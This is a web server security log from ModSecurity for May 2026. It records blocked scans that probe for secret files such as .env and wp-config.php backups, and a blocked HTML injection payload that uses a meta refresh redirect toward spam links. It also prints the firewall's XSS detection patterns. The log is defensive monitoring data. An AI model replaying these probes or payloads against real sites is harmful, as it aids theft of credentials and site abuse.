[Mon May 11 12:20:41.341704 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:65262] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /share/.env.save2024"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/share/.env.save2024"] [unique_id "agGteURdw2n9wv6Ai48SHgAAAI8"]
[Mon May 11 12:20:41.341917 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:65262] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/share/.env.save2024"] [unique_id "agGteURdw2n9wv6Ai48SHgAAAI8"]
[Mon May 11 12:20:42.572501 2026] [security2:error] [pid 1254328:tid 1254345] [client 185.177.72.9:65262] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGteURdw2n9wv6Ai48SHgAAAI8"]
[Mon May 11 12:20:56.573268 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://lonevelde.lovasok.hu/out_link.php?url=http://rlu.ru/5bjkg>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://lonevelde.lovasok.hu/out_link.php?url=http://rlu.ru/5bjkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.575601 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.577062 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.577736 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.578937 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.579401 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:56.581260 2026] [security2:error] [pid 1254242:tid 1254260] [client 194.233.64.127:49211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiL4KNmD_mZ_vlf9DeAAAAE8"]
[Mon May 11 12:20:57.210149 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://https%3a%2f%evolv.e.l.u.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://lonevelde.lovasok.hu/out_link.php?url=http://rlu.ru/5bjkg>urutan kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://lonevelde.lovasok.hu/out_link.php?url=http://rlu.ru/5bjkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.210576 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.211463 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg /> found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_AT [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.214022 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.215336 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://https%3A%2f%Evolv.e.l.U.pc@haedongacademy.org/phpinfo.php?a[]=<a href=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg>urutan Kampus terbaik di indonesia</a><meta http-equiv=refresh content=0;url=http://Lonevelde.Lovasok.hu/out_link.php?url=http://Rlu.ru/5bJkg />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "O [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.215771 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:20:57.217455 2026] [security2:error] [pid 1254133:tid 1254155] [client 194.233.64.127:49230] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agGtiRjZymfuKpjWXeiHmAAAANM"]
[Mon May 11 12:21:05.852002 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:13444] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /spec/.gitignore.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/spec/.gitignore.beta"] [unique_id "agGtkZkIEwRJMyDaV55YrQAAAVU"]
[Mon May 11 12:21:05.852425 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:13444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/spec/.gitignore.beta"] [unique_id "agGtkZkIEwRJMyDaV55YrQAAAVU"]
[Mon May 11 12:21:07.070460 2026] [security2:error] [pid 1256241:tid 1256267] [client 185.177.72.9:13444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtkZkIEwRJMyDaV55YrQAAAVU"]
[Mon May 11 12:21:07.096559 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:13448] ModSecurity: Warning. Matched phrase "/.gitignore" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.gitignore found within REQUEST_FILENAME: /spec/.gitignore.beta"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/spec/.gitignore.beta"] [unique_id "agGtk0Rdw2n9wv6Ai48SQQAAAIg"]
[Mon May 11 12:21:07.097067 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:13448] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/spec/.gitignore.beta"] [unique_id "agGtk0Rdw2n9wv6Ai48SQQAAAIg"]
[Mon May 11 12:21:08.719789 2026] [security2:error] [pid 1254328:tid 1254339] [client 185.177.72.9:13448] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtk0Rdw2n9wv6Ai48SQQAAAIg"]
[Mon May 11 12:21:17.928021 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:45574] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /spec/wp-config.php.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/spec/wp-config.php.draft"] [unique_id "agGtnWS6k_SCYd1AVZq5GAAAARE"]
[Mon May 11 12:21:17.928734 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:45574] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/spec/wp-config.php.draft"] [unique_id "agGtnWS6k_SCYd1AVZq5GAAAARE"]
[Mon May 11 12:21:18.103718 2026] [ssl:error] [pid 1256241:tid 1256263] [client 13.219.121.241:30974] AH02032: Hostname totalcloud.fr (default host as no SNI was provided) and hostname webmail.crm2.rentparadise.fr provided via HTTP have no compatible SSL setup for policy 'secure'
[Mon May 11 12:21:20.927202 2026] [security2:error] [pid 1254179:tid 1254198] [client 185.177.72.9:45574] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtnWS6k_SCYd1AVZq5GAAAARE"]
[Mon May 11 12:21:20.952346 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:45590] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /spec/wp-config.php.draft"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/spec/wp-config.php.draft"] [unique_id "agGtoL4KNmD_mZ_vlf9DmgAAAEI"]
[Mon May 11 12:21:20.953116 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:45590] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/spec/wp-config.php.draft"] [unique_id "agGtoL4KNmD_mZ_vlf9DmgAAAEI"]
[Mon May 11 12:21:23.077925 2026] [security2:error] [pid 1254242:tid 1254248] [client 185.177.72.9:45590] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGtoL4KNmD_mZ_vlf9DmgAAAEI"]
[Mon May 11 12:21:40.735684 2026] [ssl:error] [pid 1254242:tid 1254257] (EAI 2)Name or service not known: [client 17.241.219.128:35430] AH01972: could not resolve address of OCSP responder r3.o.lencr.org
[Mon May 11 12:21:40.735732 2026] [ssl:error] [pid 1254242:tid 1254257] AH01941: stapling_renew_response: responder error
